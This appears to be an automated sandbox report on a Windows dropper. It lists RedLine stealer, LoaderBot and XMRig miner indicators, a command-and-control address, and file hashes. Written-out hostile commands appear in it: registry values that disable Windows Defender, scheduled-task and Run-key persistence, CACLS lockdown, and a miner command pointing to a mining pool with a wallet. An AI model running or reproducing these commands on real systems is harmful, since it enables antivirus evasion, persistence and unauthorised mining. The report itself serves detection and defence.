Analysis
-
max time kernel
136s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2023 20:46
Static task
static1
General
-
Target
b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe
-
Size
1020KB
-
MD5
621a84e89db114a333aae881a8a496f9
-
SHA1
51f51a67889f4fa25ac4c695b59fd7382471493a
-
SHA256
b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2
-
SHA512
09e765dc40bcf8391dbb4f3d2e902f7a6630e535d173ec6a39b9e06f8983ae19891783f0ed6a3a966272408c47fc9e103e721ae518c325d0a877511afb9654f8
-
SSDEEP
24576:NyRuRHOT2qoxBvDN/szVdnH33R+PRJcSKs9rGbu:oRuR4MfNyVZ3kPHHrGb
Malware Config
Extracted
redline
lupa
83.97.73.122:19062
-
auth_value
6a764aa41830c77712442516d143bc9c
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" o8385065.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" o8385065.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" o8385065.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" o8385065.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" o8385065.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection o8385065.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 19 IoCs
resource yara_rule behavioral1/memory/4496-205-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-206-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-208-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-210-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-212-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-214-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-216-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-218-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-220-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-223-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-227-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-229-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-231-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-233-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-235-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-237-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-239-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-241-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline behavioral1/memory/4496-243-0x0000000002570000-0x00000000025AC000-memory.dmp family_redline -
LoaderBot executable 1 IoCs
resource yara_rule behavioral1/memory/1232-1224-0x0000000000400000-0x00000000007FE000-memory.dmp loaderbot -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/2868-1238-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/2868-1242-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation full_min_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation s1926613.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation legends.exe -
Executes dropped EXE 18 IoCs
pid Process 1488 z6715598.exe 4896 z6813358.exe 3860 o8385065.exe 2384 p4120004.exe 4496 r5069670.exe 4524 s1926613.exe 4500 s1926613.exe 1120 s1926613.exe 1864 legends.exe 208 legends.exe 4728 full_min_cr.exe 4444 kds7uq5kknv.exe 1860 legends.exe 2644 legends.exe 3664 full_min_cr.exe 1232 full_min_cr.exe 2868 Driver.exe 2200 legends.exe -
Loads dropped DLL 1 IoCs
pid Process 3616 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" o8385065.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features o8385065.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" z6813358.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce z6715598.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" z6715598.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce z6813358.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2312 RegSvcs.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 4524 set thread context of 1120 4524 s1926613.exe 96 PID 1864 set thread context of 208 1864 legends.exe 98 PID 4444 set thread context of 2312 4444 kds7uq5kknv.exe 112 PID 1860 set thread context of 2644 1860 legends.exe 116 PID 4728 set thread context of 1232 4728 full_min_cr.exe 118 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2272 4444 WerFault.exe 110 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3144 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3860 o8385065.exe 3860 o8385065.exe 2384 p4120004.exe 2384 p4120004.exe 4496 r5069670.exe 4496 r5069670.exe 4728 full_min_cr.exe 4728 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe 1232 full_min_cr.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 648 Process not Found -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 3860 o8385065.exe Token: SeDebugPrivilege 2384 p4120004.exe Token: SeDebugPrivilege 4496 r5069670.exe Token: SeDebugPrivilege 4524 s1926613.exe Token: SeDebugPrivilege 1864 legends.exe Token: SeLoadDriverPrivilege 2312 RegSvcs.exe Token: SeDebugPrivilege 1860 legends.exe Token: SeDebugPrivilege 4728 full_min_cr.exe Token: SeDebugPrivilege 1232 full_min_cr.exe Token: SeLockMemoryPrivilege 2868 Driver.exe Token: SeLockMemoryPrivilege 2868 Driver.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1120 s1926613.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1244 wrote to memory of 1488 1244 b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe 86 PID 1244 wrote to memory of 1488 1244 b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe 86 PID 1244 wrote to memory of 1488 1244 b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe 86 PID 1488 wrote to memory of 4896 1488 z6715598.exe 88 PID 1488 wrote to memory of 4896 1488 z6715598.exe 88 PID 1488 wrote to memory of 4896 1488 z6715598.exe 88 PID 4896 wrote to memory of 3860 4896 z6813358.exe 89 PID 4896 wrote to memory of 3860 4896 z6813358.exe 89 PID 4896 wrote to memory of 3860 4896 z6813358.exe 89 PID 4896 wrote to memory of 2384 4896 z6813358.exe 91 PID 4896 wrote to memory of 2384 4896 z6813358.exe 91 PID 4896 wrote to memory of 2384 4896 z6813358.exe 91 PID 1488 wrote to memory of 4496 1488 z6715598.exe 92 PID 1488 wrote to memory of 4496 1488 z6715598.exe 92 PID 1488 wrote to memory of 4496 1488 z6715598.exe 92 PID 1244 wrote to memory of 4524 1244 b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe 94 PID 1244 wrote to memory of 4524 1244 b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe 94 PID 1244 wrote to memory of 4524 1244 b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe 94 PID 4524 wrote to memory of 4500 4524 s1926613.exe 95 PID 4524 wrote to memory of 4500 4524 s1926613.exe 95 PID 4524 wrote to memory of 4500 4524 s1926613.exe 95 PID 4524 wrote to memory of 4500 4524 s1926613.exe 95 PID 4524 wrote to memory of 1120 4524 s1926613.exe 96 PID 4524 wrote to memory of 1120 4524 s1926613.exe 96 PID 4524 wrote to memory of 1120 4524 s1926613.exe 96 PID 4524 wrote to memory of 1120 4524 s1926613.exe 96 PID 4524 wrote to memory of 1120 4524 s1926613.exe 96 PID 4524 wrote to memory of 1120 4524 s1926613.exe 96 PID 4524 wrote to memory of 1120 4524 s1926613.exe 96 PID 4524 wrote to memory of 1120 4524 s1926613.exe 96 PID 4524 wrote to memory of 1120 4524 s1926613.exe 96 PID 4524 wrote to memory of 1120 4524 s1926613.exe 96 PID 1120 wrote to memory of 1864 1120 s1926613.exe 97 PID 1120 wrote to memory of 1864 1120 s1926613.exe 97 PID 1120 wrote to memory of 1864 1120 s1926613.exe 97 PID 1864 wrote to memory of 208 1864 legends.exe 98 PID 1864 wrote to memory of 208 1864 legends.exe 98 PID 1864 wrote to memory of 208 1864 legends.exe 98 PID 1864 wrote to memory of 208 1864 legends.exe 98 PID 1864 wrote to memory of 208 1864 legends.exe 98 PID 1864 wrote to memory of 208 1864 legends.exe 98 PID 1864 wrote to memory of 208 1864 legends.exe 98 PID 1864 wrote to memory of 208 1864 legends.exe 98 PID 1864 wrote to memory of 208 1864 legends.exe 98 PID 1864 wrote to memory of 208 1864 legends.exe 98 PID 208 wrote to memory of 3144 208 legends.exe 99 PID 208 wrote to memory of 3144 208 legends.exe 99 PID 208 wrote to memory of 3144 208 legends.exe 99 PID 208 wrote to memory of 2972 208 legends.exe 101 PID 208 wrote to memory of 2972 208 legends.exe 101 PID 208 wrote to memory of 2972 208 legends.exe 101 PID 2972 wrote to memory of 3500 2972 cmd.exe 103 PID 2972 wrote to memory of 3500 2972 cmd.exe 103 PID 2972 wrote to memory of 3500 2972 cmd.exe 103 PID 2972 wrote to memory of 1012 2972 cmd.exe 104 PID 2972 wrote to memory of 1012 2972 cmd.exe 104 PID 2972 wrote to memory of 1012 2972 cmd.exe 104 PID 2972 wrote to memory of 2148 2972 cmd.exe 105 PID 2972 wrote to memory of 2148 2972 cmd.exe 105 PID 2972 wrote to memory of 2148 2972 cmd.exe 105 PID 2972 wrote to memory of 2004 2972 cmd.exe 106 PID 2972 wrote to memory of 2004 2972 cmd.exe 106 PID 2972 wrote to memory of 2004 2972 cmd.exe 106 PID 2972 wrote to memory of 5048 2972 cmd.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe"C:\Users\Admin\AppData\Local\Temp\b3dec2c71fbda914fbe2072812aff7911a2cd9202085530716b807cbbaab0ca2.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z6715598.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z6715598.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z6813358.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z6813358.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\o8385065.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\o8385065.exe4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3860
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\p4120004.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\p4120004.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r5069670.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r5069670.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s1926613.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s1926613.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s1926613.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s1926613.exe3⤵
- Executes dropped EXE
PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s1926613.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s1926613.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe"C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legends.exe /TR "C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe" /F6⤵
- Creates scheduled task(s)
PID:3144
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legends.exe" /P "Admin:N"&&CACLS "legends.exe" /P "Admin:R" /E&&echo Y|CACLS "..\41bde21dc7" /P "Admin:N"&&CACLS "..\41bde21dc7" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:3500
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legends.exe" /P "Admin:N"7⤵PID:1012
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legends.exe" /P "Admin:R" /E7⤵PID:2148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:2004
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\41bde21dc7" /P "Admin:N"7⤵PID:5048
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\41bde21dc7" /P "Admin:R" /E7⤵PID:4716
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000027001\full_min_cr.exe"C:\Users\Admin\AppData\Local\Temp\1000027001\full_min_cr.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728 -
C:\Users\Admin\AppData\Local\Temp\1000027001\full_min_cr.exe"{path}"7⤵
- Executes dropped EXE
PID:3664
-
-
C:\Users\Admin\AppData\Local\Temp\1000027001\full_min_cr.exe"{path}"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 28⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000028001\kds7uq5kknv.exe"C:\Users\Admin\AppData\Local\Temp\1000028001\kds7uq5kknv.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4444 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 1487⤵
- Program crash
PID:2272
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main6⤵
- Loads dropped DLL
PID:3616
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4444 -ip 44441⤵PID:3080
-
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1860 -
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe2⤵
- Executes dropped EXE
PID:2644
-
-
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe1⤵
- Executes dropped EXE
PID:2200
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD517573558c4e714f606f997e5157afaac
SHA113e16e9415ceef429aaf124139671ebeca09ed23
SHA256c18db6aecad2436da4a63ff26af4e3a337cca48f01c21b8db494fe5ccc60e553
SHA512f4edf13f05a0d142e4dd42802098c8c44988ee8869621a62c2b565a77c9a95857f636583ff8d6d9baa366603d98b9bfbf1fc75bc6f9f8f83c80cb1215b2941cc
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
2.7MB
MD5e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
SHA512d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
Filesize
2.7MB
MD5e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
SHA512d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
Filesize
2.7MB
MD5e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
SHA512d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
Filesize
2.7MB
MD5e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
SHA512d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
Filesize
2.7MB
MD5e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
SHA512d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
-
Filesize
2.0MB
MD5433dbed8a7afbf15bfee967c63a50769
SHA1858e1279c2f6a47051eb963012099d11d60a881d
SHA2566c5cff00451680070af8daca0a59ee6a6f467f6b3152f60de6cec6cdcb9cf601
SHA51206c6af80a5ccc79bcabc64c217289eb3aeaca0fddbe9f1bd60de9927690a77dfd850edcfe0a1f2523e10f0074ae8bcb61076a9feb38d0113d38aff0121a36c4e
-
Filesize
2.0MB
MD5433dbed8a7afbf15bfee967c63a50769
SHA1858e1279c2f6a47051eb963012099d11d60a881d
SHA2566c5cff00451680070af8daca0a59ee6a6f467f6b3152f60de6cec6cdcb9cf601
SHA51206c6af80a5ccc79bcabc64c217289eb3aeaca0fddbe9f1bd60de9927690a77dfd850edcfe0a1f2523e10f0074ae8bcb61076a9feb38d0113d38aff0121a36c4e
-
Filesize
2.0MB
MD5433dbed8a7afbf15bfee967c63a50769
SHA1858e1279c2f6a47051eb963012099d11d60a881d
SHA2566c5cff00451680070af8daca0a59ee6a6f467f6b3152f60de6cec6cdcb9cf601
SHA51206c6af80a5ccc79bcabc64c217289eb3aeaca0fddbe9f1bd60de9927690a77dfd850edcfe0a1f2523e10f0074ae8bcb61076a9feb38d0113d38aff0121a36c4e
-
Filesize
963KB
MD5b4b1ce52974ac1cbfd90947f52cef639
SHA19d177d1ba86933a67fd5e10a4f274c705d39449a
SHA2560c1ed5f523bf681f03d5785eb7e7bdd648225d957dd37a8ff41b81154ebb3930
SHA512085239e3925bb6b55b0e7fbc4aa780ddce08b3cc74ed035f1c2dd5171f41515c930aa8ce2f31521434b79b2e05821a452a7c0daad1314df4516e301b76654248
-
Filesize
963KB
MD5b4b1ce52974ac1cbfd90947f52cef639
SHA19d177d1ba86933a67fd5e10a4f274c705d39449a
SHA2560c1ed5f523bf681f03d5785eb7e7bdd648225d957dd37a8ff41b81154ebb3930
SHA512085239e3925bb6b55b0e7fbc4aa780ddce08b3cc74ed035f1c2dd5171f41515c930aa8ce2f31521434b79b2e05821a452a7c0daad1314df4516e301b76654248
-
Filesize
963KB
MD5b4b1ce52974ac1cbfd90947f52cef639
SHA19d177d1ba86933a67fd5e10a4f274c705d39449a
SHA2560c1ed5f523bf681f03d5785eb7e7bdd648225d957dd37a8ff41b81154ebb3930
SHA512085239e3925bb6b55b0e7fbc4aa780ddce08b3cc74ed035f1c2dd5171f41515c930aa8ce2f31521434b79b2e05821a452a7c0daad1314df4516e301b76654248
-
Filesize
963KB
MD5b4b1ce52974ac1cbfd90947f52cef639
SHA19d177d1ba86933a67fd5e10a4f274c705d39449a
SHA2560c1ed5f523bf681f03d5785eb7e7bdd648225d957dd37a8ff41b81154ebb3930
SHA512085239e3925bb6b55b0e7fbc4aa780ddce08b3cc74ed035f1c2dd5171f41515c930aa8ce2f31521434b79b2e05821a452a7c0daad1314df4516e301b76654248
-
Filesize
963KB
MD5b4b1ce52974ac1cbfd90947f52cef639
SHA19d177d1ba86933a67fd5e10a4f274c705d39449a
SHA2560c1ed5f523bf681f03d5785eb7e7bdd648225d957dd37a8ff41b81154ebb3930
SHA512085239e3925bb6b55b0e7fbc4aa780ddce08b3cc74ed035f1c2dd5171f41515c930aa8ce2f31521434b79b2e05821a452a7c0daad1314df4516e301b76654248
-
Filesize
963KB
MD5b4b1ce52974ac1cbfd90947f52cef639
SHA19d177d1ba86933a67fd5e10a4f274c705d39449a
SHA2560c1ed5f523bf681f03d5785eb7e7bdd648225d957dd37a8ff41b81154ebb3930
SHA512085239e3925bb6b55b0e7fbc4aa780ddce08b3cc74ed035f1c2dd5171f41515c930aa8ce2f31521434b79b2e05821a452a7c0daad1314df4516e301b76654248
-
Filesize
963KB
MD5b4b1ce52974ac1cbfd90947f52cef639
SHA19d177d1ba86933a67fd5e10a4f274c705d39449a
SHA2560c1ed5f523bf681f03d5785eb7e7bdd648225d957dd37a8ff41b81154ebb3930
SHA512085239e3925bb6b55b0e7fbc4aa780ddce08b3cc74ed035f1c2dd5171f41515c930aa8ce2f31521434b79b2e05821a452a7c0daad1314df4516e301b76654248
-
Filesize
963KB
MD5b4b1ce52974ac1cbfd90947f52cef639
SHA19d177d1ba86933a67fd5e10a4f274c705d39449a
SHA2560c1ed5f523bf681f03d5785eb7e7bdd648225d957dd37a8ff41b81154ebb3930
SHA512085239e3925bb6b55b0e7fbc4aa780ddce08b3cc74ed035f1c2dd5171f41515c930aa8ce2f31521434b79b2e05821a452a7c0daad1314df4516e301b76654248
-
Filesize
963KB
MD5b4b1ce52974ac1cbfd90947f52cef639
SHA19d177d1ba86933a67fd5e10a4f274c705d39449a
SHA2560c1ed5f523bf681f03d5785eb7e7bdd648225d957dd37a8ff41b81154ebb3930
SHA512085239e3925bb6b55b0e7fbc4aa780ddce08b3cc74ed035f1c2dd5171f41515c930aa8ce2f31521434b79b2e05821a452a7c0daad1314df4516e301b76654248
-
Filesize
963KB
MD5b4b1ce52974ac1cbfd90947f52cef639
SHA19d177d1ba86933a67fd5e10a4f274c705d39449a
